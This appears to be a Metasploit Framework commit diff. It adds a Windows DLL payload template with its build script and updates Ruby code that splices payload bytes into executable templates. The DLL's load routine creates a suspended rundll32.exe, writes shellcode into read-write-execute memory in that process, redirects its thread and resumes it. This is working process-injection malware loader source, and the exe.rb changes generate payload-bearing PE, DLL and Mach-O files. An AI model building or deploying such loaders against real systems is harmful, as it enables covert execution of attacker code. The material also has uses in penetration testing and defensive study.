fixup some of the payload exe generation/templating stuff, add pe/dll template+src

git-svn-id: file:///home/svn/framework3/trunk@9073 4d416f70-5f16-0410-b530-b9f4589650da

data/templates/src/pe/dll/build.sh

@@ -0,0 +1,16 @@
+if [ -z "$PREFIX" ]; then
+  PREFIX=i586-mingw32msvc
+fi
+
+rm -f *.o *.dll
+$PREFIX-gcc -c template.c
+$PREFIX-windres -o rc.o template.rc
+$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
+rm -f junk.tmp
+$PREFIX-dlltool --dllname template.dll --base-file base.tmp --output-exp temp.exp --def template.def
+rm -f base.tmp
+$PREFIX-gcc -mdll -o template.dll template.o rc.o -Wl,temp.exp
+rm -f temp.exp
+
+$PREFIX-strip template.dll
+rm -f *.o

data/templates/src/pe/dll/template.c

@@ -0,0 +1,82 @@
+#include <windows.h>
+#include "template.h"
+
+
+void ExecutePayload(void);
+
+BOOL WINAPI
+DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
+{
+    switch (dwReason)
+    {
+        case DLL_PROCESS_ATTACH:
+			ExecutePayload();
+            break;
+
+        case DLL_PROCESS_DETACH:
+            // Code to run when the DLL is freed
+            break;
+
+        case DLL_THREAD_ATTACH:
+            // Code to run when a thread is created during the DLL's lifetime
+            break;
+
+        case DLL_THREAD_DETACH:
+            // Code to run when a thread ends normally.
+            break;
+    }
+    return TRUE;
+}
+
+void ExecutePayload(void) {
+    int error;
+	PROCESS_INFORMATION pi;
+	STARTUPINFO si;
+	CONTEXT ctx;
+	DWORD ep, prot;
+
+	// Start up the payload in a new process
+	ZeroMemory( &si, sizeof( si ));
+	si.cb = sizeof(si);
+
+	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
+	if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
+		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
+		GetThreadContext(pi.hThread, &ctx);
+
+		ep = (DWORD) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
+
+		ctx.Eip = ep;
+        SetThreadContext(pi.hThread,&ctx);
+
+        ResumeThread(pi.hThread);
+        CloseHandle(pi.hThread);
+        CloseHandle(pi.hProcess);
+	}
+   // ExitProcess(0);
+   ExitThread(0);
+}
+
+/*
+typedef VOID
+(NTAPI *PIMAGE_TLS_CALLBACK) (
+    PVOID DllHandle,
+    ULONG Reason,
+    PVOID Reserved
+    );
+
+VOID NTAPI TlsCallback(
+      IN PVOID DllHandle,
+      IN ULONG Reason,
+      IN PVOID Reserved)
+{
+	__asm  ( "int3" );
+}
+
+ULONG _tls_index;
+PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
+IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
+*/
+

data/templates/src/pe/dll/template.def

@@ -0,0 +1,3 @@
+EXPORTS
+DllMain@12
+

data/templates/src/pe/dll/template.rc

@@ -0,0 +1,18 @@
+
+LANGUAGE 9, 1
+
+
+VS_VERSION_INFO VERSIONINFO
+ FILEVERSION 0,0,0,1
+ PRODUCTVERSION 0,0,0,1
+ FILEFLAGSMASK 0x17L
+ FILEFLAGS 0x0L
+ FILEOS 0x4L
+ FILETYPE 0x2L
+ FILESUBTYPE 0x0L
+BEGIN
+
+END
+
+#define RT_HTML  23
+

lib/msf/util/exe.rb

@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ###
 #
 # framework-util-exe
@@ -282,8 +286,10 @@ require 'metasm'
 		end
 
 		bo = pe.index('PAYLOAD:')
-		pe[bo,  2048] = code if bo
-		pe[136,    4] = [rand(0x100000000)].pack('V')
+		raise RuntimeError, "Invalid Win32 PE OLD EXE template!" if not bo
+		pe[bo, code.length] = code
+
+		pe[136, 4] = [rand(0x100000000)].pack('V')
 
 		ci = pe.index("\x31\xc9" * 160)
 		cd = pe.index("\x31\xc9" * 160, ci + 320)
@@ -314,7 +320,8 @@ require 'metasm'
 		fd.close
 
 		bo = pe.index('PAYLOAD:')
-		pe[bo,2048] = [code].pack('a2048') if bo
+		raise RuntimeError, "Invalid Win64 PE EXE template!" if not bo
+		pe[bo, code.length] = code
 
 		return pe
 	end
@@ -327,16 +334,32 @@ require 'metasm'
 		fd.close
 
 		bo = pe.index('PAYLOAD:')
-		pe[bo, 2048] = [code].pack('a2048') if bo
+		raise RuntimeError, "Invalid Win32 PE Service EXE template!" if not bo
+		pe[bo, code.length] = code
 
 		bo = pe.index('SERVICENAME')
-		pe[bo, 11] = [name].pack('a11') if bo
+		raise RuntimeError, "Invalid Win32 PE Service EXE template!" if not bo
+		pe[bo, name.length] = name
 
 		pe[136, 4] = [rand(0x100000000)].pack('V')
 
 		return pe
 	end
 
+	def self.to_win32pe_dll(framework, code)
+		pe = ''
+
+		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template.dll"), "rb")
+		pe = fd.read(fd.stat.size)
+		fd.close
+
+		bo = pe.index('PAYLOAD:')
+		raise RuntimeError, "Invalid Win32 PE DLL template!" if not bo
+		pe[bo, code.length] = code
+
+		return pe
+	end
+
 	def self.to_osx_arm_macho(framework, code)
 		mo = ''
 
@@ -344,10 +367,14 @@ require 'metasm'
 		mo = fd.read(fd.stat.size)
 		fd.close
 
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
+		bo = mo.index('PAYLOAD:')
+		raise RuntimeError, "Invalid OSX ArmLE Mach-O template!" if not bo
+		mo[bo, code.length] = code
+
+		# Not used?
+		#co = mo.index('COMMENT:')
+		#mo[co, comment.length] = comment
 
-		mo[bo, 2048] = [code].pack('a2048') if bo
 		return mo
 	end
 
@@ -358,10 +385,13 @@ require 'metasm'
 		mo = fd.read(fd.stat.size)
 		fd.close
 
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
+		bo = mo.index('PAYLOAD:')
+		raise RuntimeError, "Invalid OSX PPC Mach-O template!" if not bo
+		mo[bo, code.length] = code
 
-		mo[bo, 2048] = [code].pack('a2048') if bo
+		# Not used?
+		#co = mo.index('COMMENT:')
+		#mo[co, comment.length] = comment
 
 		return mo
 	end
@@ -373,10 +403,13 @@ require 'metasm'
 		mo = fd.read(fd.stat.size)
 		fd.close
 
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
+		bo = mo.index('PAYLOAD:')
+		raise RuntimeError, "Invalid OSX x86 Mach-O template!" if not bo
+		mo[bo, code.length] = code
 
-		mo[bo, 2048] = [code].pack('a2048') if bo
+		# Not used?
+		#co = mo.index('COMMENT:')
+		#mo[co, comment.length] = comment
 
 		return mo
 	end
@@ -403,6 +436,7 @@ require 'metasm'
 
 		return mo
 	end
+
 	def self.to_exe_vba(exes='')
 		exe = exes.unpack('C*')
 		vba = ""